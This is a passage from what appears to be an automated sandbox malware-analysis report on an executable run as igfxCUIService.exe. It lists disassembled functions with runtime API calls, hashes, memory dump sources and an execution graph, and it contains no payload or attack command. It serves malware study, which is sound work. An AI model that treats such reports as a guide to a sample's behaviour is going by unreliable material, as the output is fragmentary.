                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionRaise___std_exception_copy
                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 3109751735-1866435925
                                  • Opcode ID: 715dc07dde1f025595d890dfd9a04b2a1f56c6d59c3cd5193484520b46451bb2
                                  • Instruction ID: 9e5f607f1700360bbd88e17774ba485271b1908920eb8c1ad5036d7195ab3dd4
                                  • Opcode Fuzzy Hash: 715dc07dde1f025595d890dfd9a04b2a1f56c6d59c3cd5193484520b46451bb2
                                  • Instruction Fuzzy Hash: 911103B15103086BCB04DF58D802BA6F3E8EF60310F14896BF9158BA81FB70E954CBA5
                                  Uniqueness

                                  Uniqueness Score: 7.75%

                                  Function 00C0727B, Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strrchr
                                  • String ID:
                                  • API String ID: 3213747228-0
                                  • Opcode ID: 30215aa7633be5a151444ef3af0f45258a63018f10652b0b38a6e06bf638477f
                                  • Instruction ID: b4db753f81f60a114f5856c7be373727475d0406a53cf64e65b69db025454b69
                                  • Opcode Fuzzy Hash: 30215aa7633be5a151444ef3af0f45258a63018f10652b0b38a6e06bf638477f
                                  • Instruction Fuzzy Hash: C1B15931D082459FDB19CF68C8417FEBBF5EF55340F2482AAE854DB281D234AE41DB60
                                  Uniqueness

                                  Uniqueness Score: 0.57%

                                  Function 00BE6D40, Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                  Download Yara Rule
                                  APIs
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000004,?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00BE6E01
                                  • GetLastError.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00BE6E15
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00BE6E31
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00BE6E59
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$ErrorLast
                                  • String ID:
                                  • API String ID: 1717984340-0
                                  • Opcode ID: 059fd646b8d3ce90e901801213f6d893202876b34d018f0acc08239756e084b8
                                  • Instruction ID: 98978c08c4916638ebcdb6186edbaf518de775821bdd807e1dbf21d25fc0becf
                                  • Opcode Fuzzy Hash: 059fd646b8d3ce90e901801213f6d893202876b34d018f0acc08239756e084b8
                                  • Instruction Fuzzy Hash: 9C51E875600245EBCB249F69DC41FAEB7E5EF64740F1481ADF9059B281EB31F910CB91
                                  Uniqueness

                                  Uniqueness Score: 0.07%

                                  Function 00BF8FD1, Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: cf5435f4d5e4daa5ae8843d7af8b241029262684930e5fc4bb02ac1134481622
                                  • Instruction ID: a4afbbf432b3b4ca07d9aeb9049d7afe3dd859f9f960980ad3121eaf09b8f9e5
                                  • Opcode Fuzzy Hash: cf5435f4d5e4daa5ae8843d7af8b241029262684930e5fc4bb02ac1134481622
                                  • Instruction Fuzzy Hash: 8351E57160420EAFEB299F24D885B7A77E4EF40710F1445ADEF0567291EB32ED58CB90
                                  Uniqueness

                                  Uniqueness Score: 1.18%

                                  Function 00C158AE, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 00C1597E
                                  • _free.LIBCMT ref: 00C159A7
                                  • SetEndOfFile.KERNEL32(00000000,00C13F56,00000000,00C08E9C,?,?,?,?,?,?,?,00C13F56,00C08E9C,00000000), ref: 00C159D9
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00C13F56,00C08E9C,00000000,?,?,?,?,00000000), ref: 00C159F5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFileLast
                                  • String ID:
                                  • API String ID: 1547350101-0
                                  • Opcode ID: 3f5d571402001bb5709bb17eac31023fab44bac60056449ae8493099dacca126
                                  • Instruction ID: deb538cc5c19a6eaf9e2b6751dedc377437f393b18bd79edab43e235e5f01156
                                  • Opcode Fuzzy Hash: 3f5d571402001bb5709bb17eac31023fab44bac60056449ae8493099dacca126
                                  • Instruction Fuzzy Hash: CA41E672900A05DBDB11ABA8CC46BDD77A5AF86330F154210F834E71D1EA30CE92F762
                                  Uniqueness

                                  Uniqueness Score: 1.64%

                                  Function 00C06F6D, Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(00000008,?,00000000,00C0C55A,00BF591B,00BF5961,?,00BF57A8,00000000), ref: 00C06F72
                                  • _free.LIBCMT ref: 00C06FCF
                                  • _free.LIBCMT ref: 00C07005
                                  • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00BF57A8,00000000), ref: 00C07010
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast_free
                                  • String ID:
                                  • API String ID: 2283115069-0
                                  • Opcode ID: d440da8295a845f0852c866ccf35d1067188eaa62af0f46cc423c90f34cc7f4d
                                  • Instruction ID: 893e64b5ad49935e96640db51edadb1858e0f412f22864a5c74964e3ffb78f79
                                  • Opcode Fuzzy Hash: d440da8295a845f0852c866ccf35d1067188eaa62af0f46cc423c90f34cc7f4d
                                  • Instruction Fuzzy Hash: A1110A726047126BD6212BB5EC85F2F215A9BC13B8F354334F135921D3ED31CD22E261
                                  Uniqueness

                                  Uniqueness Score: 0.28%

                                  Function 00C070C4, Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,00C0185C,00C06950,?,?,00BF48E0,?,?,00BE8B4A,?,?,00BD1154), ref: 00C070C9
                                  • _free.LIBCMT ref: 00C07126
                                  • _free.LIBCMT ref: 00C0715C
                                  • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00C0185C,00C06950,?,?,00BF48E0,?,?,00BE8B4A,?), ref: 00C07167
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast_free
                                  • String ID:
                                  • API String ID: 2283115069-0
                                  • Opcode ID: 6419693c48a0321c135c5b6e49c41807f57eeb4e94fea095a4d7969a3f87643a
                                  • Instruction ID: 12ba3768160cbe19a29dc5ffe0a0b79d02d3b27353c9b167a6e31ba4751932dc
                                  • Opcode Fuzzy Hash: 6419693c48a0321c135c5b6e49c41807f57eeb4e94fea095a4d7969a3f87643a
                                  • Instruction Fuzzy Hash: 8011E932A087116BE6252675DC85F2F216ADBC2778F358334F135926E3ED31DE12D261
                                  Uniqueness

                                  Uniqueness Score: 0.28%

                                  Function 00C157A2, Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00C1329D,00000000,00000001,00000000,00000000,?,00C08407,?,00C01707,00000000), ref: 00C157B9
                                  • GetLastError.KERNEL32(?,00C1329D,00000000,00000001,00000000,00000000,?,00C08407,?,00C01707,00000000,?,00000000,?,00C0895B,?), ref: 00C157C5
                                    • Part of subcall function 00C1578B: CloseHandle.KERNEL32(FFFFFFFE,00C157D5,?,00C1329D,00000000,00000001,00000000,00000000,?,00C08407,?,00C01707,00000000,?,00000000), ref: 00C1579B
                                  • ___initconout.LIBCMT ref: 00C157D5
                                    • Part of subcall function 00C1574D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C1577C,00C1328A,00000000,?,00C08407,?,00C01707,00000000,?), ref: 00C15760
                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00C1329D,00000000,00000001,00000000,00000000,?,00C08407,?,00C01707,00000000,?), ref: 00C157EA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                  • String ID:
                                  • API String ID: 2744216297-0
                                  • Opcode ID: dfa7b4a50c97c76264ca8867a08c620d883bf8915e78b52c636746e9c57f0fa1
                                  • Instruction ID: 81c55f48383541f1811ff5550842d4db9a9d4fedf8669e0225588951ee818355
                                  • Opcode Fuzzy Hash: dfa7b4a50c97c76264ca8867a08c620d883bf8915e78b52c636746e9c57f0fa1
                                  • Instruction Fuzzy Hash: 1FF01C36411624FBCF226F91DC0ABDD3F66FB4A3A0B014011FA1995171C63289A0EBD1
                                  Uniqueness

                                  Uniqueness Score: 0.24%

                                  Function 00BF467D, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                  Download Yara Rule
                                  APIs
                                  • SleepConditionVariableCS.KERNELBASE(?,00BF461A,00000064), ref: 00BF46A0
                                  • LeaveCriticalSection.KERNEL32(00C2F1D8,?,?,00BF461A,00000064,?,00C3013C,?,00BD4124,00C301A8,00C3013C,00BD834F,5CB9E59C,0000000F,?,00000000), ref: 00BF46AA
                                  • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00BF461A,00000064,?,00C3013C,?,00BD4124,00C301A8,00C3013C,00BD834F,5CB9E59C,0000000F,?,00000000), ref: 00BF46BB
                                  • EnterCriticalSection.KERNEL32(00C2F1D8,?,00BF461A,00000064,?,00C3013C,?,00BD4124,00C301A8,00C3013C,00BD834F,5CB9E59C,0000000F,?,00000000), ref: 00BF46C2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                  • String ID:
                                  • API String ID: 3269011525-0
                                  • Opcode ID: 312ff91c45415439934e0e399c0bdb267a461fb0d656004cbb4be996797a63d3
                                  • Instruction ID: 75805cb6c6f54abf97fbaed8c6ce62879838894aac48c8b9a1cfa45900d6a01d
                                  • Opcode Fuzzy Hash: 312ff91c45415439934e0e399c0bdb267a461fb0d656004cbb4be996797a63d3
                                  • Instruction Fuzzy Hash: CBE0ED36542228FBCF111B50FC09BEE7A38AB0AB62B5080B4FA0667560C76119269BE5
                                  Uniqueness

                                  Uniqueness Score: 3.32%

                                  Function 00BD3040, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 273UNIQUE
                                  Download Yara Rule
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00BD33AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: parse error$ror
                                  • API String ID: 2659868963-4201802366
                                  • Opcode ID: cbf69417a70954cd6d1e657042b3ac6b3b59ff43ff998456e545ef59a8585b55
                                  • Instruction ID: 41d1680b4e2dcb6ff1726859fd212d4248b0c5562175197a198eed5b440760e7
                                  • Opcode Fuzzy Hash: cbf69417a70954cd6d1e657042b3ac6b3b59ff43ff998456e545ef59a8585b55
                                  • Instruction Fuzzy Hash: E3B1B1719002588FEB19CF68CD45BADFBB2EF45304F1082D9E408AB396EB759AC4CB51
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00BF1730, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 259UNIQUE
                                  Download Yara Rule
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00BF1800
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID: cannot get value
                                  • API String ID: 118556049-2333289761
                                  • Opcode ID: d9b4b19be006df723c17d79442467b0c2d04f564c3ea310f2ca61170a37aef69
                                  • Instruction ID: ae055c9a340760794e696e3ec78527e089239b564eceb295414045829b68e6d8
                                  • Opcode Fuzzy Hash: d9b4b19be006df723c17d79442467b0c2d04f564c3ea310f2ca61170a37aef69
                                  • Instruction Fuzzy Hash: A391AF75900249DFCB14DF98C8909EEFBF4FF48310B148A99D955AB346D770AD0ACB90
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00BD2D50, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 255UNIQUE
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: [json.exception.
                                  • API String ID: 0-791563284
                                  • Opcode ID: 88e3545bb70ee627000e302b473c8c9070389b3bf423bebae96830094c89386d
                                  • Instruction ID: 2aa34da19045f218445e90d3973670039318de18c256379b92988e00a9bb78cb
                                  • Opcode Fuzzy Hash: 88e3545bb70ee627000e302b473c8c9070389b3bf423bebae96830094c89386d
                                  • Instruction Fuzzy Hash: 27912971D002888BEB19CF68C845BAEFBF5EF55300F10469DE814A77D2E7759A85CBA0
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00C0B7FF, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100UNIQUELIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00C0B5A8: GetOEMCP.KERNEL32(00000000,00C0B81A,?,00000000,00C0F573,00C0F573,00000000,00000000,?), ref: 00C0B5D3
                                  • _free.LIBCMT ref: 00C0B877
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID: `6
                                  • API String ID: 269201875-4267953654
                                  • Opcode ID: c2244743a914a48a2578bbfa1a98279b1258f0b82d94b828a0b4218c4d51d407
                                  • Instruction ID: f9d5576fd303a5a0032da90909923915dcf05a3aeb9269b6181501b061bbb586
                                  • Opcode Fuzzy Hash: c2244743a914a48a2578bbfa1a98279b1258f0b82d94b828a0b4218c4d51d407
                                  • Instruction Fuzzy Hash: 42319071900249AFDB11DFA8C880B9E77E9EF44314F158269F920AB2E1E731DE50DB50
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00BD2850, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00BD287B
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BD28CA
                                    • Part of subcall function 00BF5876: _Yarn.LIBCPMT ref: 00BF5895
                                    • Part of subcall function 00BF5876: _Yarn.LIBCPMT ref: 00BF58B9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                  • String ID: bad locale name
                                  • API String ID: 1908188788-1405518554
                                  • Opcode ID: d1b37d0d19628b3d432080c3335ae2f5535de9d9bde9cedb5a9127923904655c
                                  • Instruction ID: 144a2d91dd275251457adcc31df205eef635e04d7f2999402504da37d47c330d
                                  • Opcode Fuzzy Hash: d1b37d0d19628b3d432080c3335ae2f5535de9d9bde9cedb5a9127923904655c
                                  • Instruction Fuzzy Hash: 19119E71904B849FD320CF69C80175BBBE8EF19710F008A6EE48AD7B80D7B5A508CBA1
                                  Uniqueness

                                  Uniqueness Score: 3.53%

                                  Function 00BE92E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41UNIQUE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BF55C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BF55D0
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00BE930F
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00BE9336
                                  Strings
                                  • invalid string position, xrefs: 00BE92E0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy$std::invalid_argument::invalid_argument
                                  • String ID: invalid string position
                                  • API String ID: 2082942147-1799206989
                                  • Opcode ID: 7931a0aba256eb8e6e62ad2ae24ee2f00f1d4f482c454dc2e1134748a8219980
                                  • Instruction ID: c1e4dcf204636d3a97373fa7296a0958b5500dc7ff0f109e6a66fba632afa5db
                                  • Opcode Fuzzy Hash: 7931a0aba256eb8e6e62ad2ae24ee2f00f1d4f482c454dc2e1134748a8219980
                                  • Instruction Fuzzy Hash: 3CF04FF2911B09ABC701EF65D841882F7ECFE563203108726E62497A00F7B0F5A88BA1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Analysis Process: igfxCUIService.exe PID: 4384 Parent PID: 5732 igfxCUIService.exeUNIQUE

                                  Execution Graph

                                  Execution Coverage:3.8%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:1291
                                  Total number of Limit Nodes:55

                                  Graph

                                  execution_graph 32090 d491f4 32091 d49201 32090->32091 32092 d49219 32090->32092 32147 d41857 14 API calls _free 32091->32147 32096 d49278 32092->32096 32104 d49211 32092->32104 32149 d4a23e 15 API calls 2 library calls 32092->32149 32094 d49206 32148 d41341 25 API calls __strnicoll 32094->32148 32110 d463e8 32096->32110 32099 d49290 32117 d4a79b 32099->32117 32102 d463e8 __fread_nolock 25 API calls 32103 d492c4 32102->32103 32103->32104 32105 d463e8 __fread_nolock 25 API calls 32103->32105 32106 d492d2 32105->32106 32106->32104 32107 d463e8 __fread_nolock 25 API calls 32106->32107 32108 d492e2 32107->32108 32109 d463e8 __fread_nolock 25 API calls 32108->32109 32109->32104 32111 d463f4 32110->32111 32112 d46409 32110->32112 32150 d41857 14 API calls _free 32111->32150 32112->32099 32114 d463f9 32151 d41341 25 API calls __strnicoll 32114->32151 32116 d46404 32116->32099 32118 d4a7a7 __FrameHandler3::FrameUnwindToState 32117->32118 32119 d4a7c7 32118->32119 32120 d4a7af 32118->32120 32121 d4a884 32119->32121 32125 d4a7fd 32119->32125 32218 d41844 14 API calls _free 32120->32218 32225 d41844 14 API calls _free 32121->32225 32124 d4a7b4 32219 d41857 14 API calls _free 32124->32219 32128 d4a806 32125->32128 32129 d4a81b 32125->32129 32126 d4a889 32226 d41857 14 API calls _free 32126->32226 32220 d41844 14 API calls _free 32128->32220 32152 d4c81f EnterCriticalSection 32129->32152 32133 d4a813 32227 d41341 25 API calls __strnicoll 32133->32227 32134 d4a80b 32221 d41857 14 API calls _free 32134->32221 32135 d4a821 32138 d4a852 32135->32138 32139 d4a83d 32135->32139 32136 d49297 32136->32102 32136->32104 32153 d4a8af 32138->32153 32222 d41857 14 API calls _free 32139->32222 32143 d4a84d 32224 d4a87c LeaveCriticalSection __wsopen_s 32143->32224 32144 d4a842 32223 d41844 14 API calls _free 32144->32223 32147->32094 32148->32104 32149->32096 32150->32114 32151->32116 32152->32135 32154 d4a8c1 32153->32154 32155 d4a8d9 32153->32155 32237 d41844 14 API calls _free 32154->32237 32156 d4ac40 32155->32156 32162 d4a919 32155->32162 32262 d41844 14 API calls _free 32156->32262 32159 d4a8c6 32238 d41857 14 API calls _free 32159->32238 32161 d4ac45 32263 d41857 14 API calls _free 32161->32263 32164 d4a924 32162->32164 32167 d4a8ce 32162->32167 32171 d4a953 32162->32171 32239 d41844 14 API calls _free 32164->32239 32165 d4a931 32264 d41341 25 API calls __strnicoll 32165->32264 32167->32143 32168 d4a929 32240 d41857 14 API calls _free 32168->32240 32172 d4a96c 32171->32172 32173 d4a987 32171->32173 32174 d4a9c3 32171->32174 32172->32173 32180 d4a971 32172->32180 32241 d41844 14 API calls _free 32173->32241 32244 d4690d 32174->32244 32176 d4a98c 32242 d41857 14 API calls _free 32176->32242 32228 d51bca 32180->32228 32183 d4a993 32243 d41341 25 API calls __strnicoll 32183->32243 32184 d4ab1a 32187 d4ab90 32184->32187 32190 d4ab33 GetConsoleMode 32184->32190 32185 d4a9e3 32252 d468d3 14 API calls _free 32185->32252 32189 d4ab94 ReadFile 32187->32189 32192 d4abae 32189->32192 32193 d4ac08 GetLastError 32189->32193 32190->32187 32194 d4ab44 32190->32194 32191 d4a9ea 32195 d4a9f4 32191->32195 32196 d4aa0f 32191->32196 32192->32193 32199 d4ab85 32192->32199 32197 d4ac15 32193->32197 32198 d4ab6c 32193->32198 32194->32189 32200 d4ab4a ReadConsoleW 32194->32200 32253 d41857 14 API calls _free 32195->32253 32255 d4ae02 27 API calls __wsopen_s 32196->32255 32260 d41857 14 API calls _free 32197->32260 32216 d4a99e __fread_nolock 32198->32216 32256 d41821 14 API calls 2 library calls 32198->32256 32211 d4abd3 32199->32211 32212 d4abea 32199->32212 32199->32216 32200->32199 32205 d4ab66 GetLastError 32200->32205 32205->32198 32206 d4a9f9 32254 d41844 14 API calls _free 32206->32254 32207 d4ac1a 32261 d41844 14 API calls _free 32207->32261 32258 d4a5c9 30 API calls 5 library calls 32211->32258 32213 d4ac01 32212->32213 32212->32216 32259 d4a3f8 28 API calls __wsopen_s 32213->32259 32257 d468d3 14 API calls _free 32216->32257 32217 d4ac06 32217->32216 32218->32124 32219->32136 32220->32134 32221->32133 32222->32144 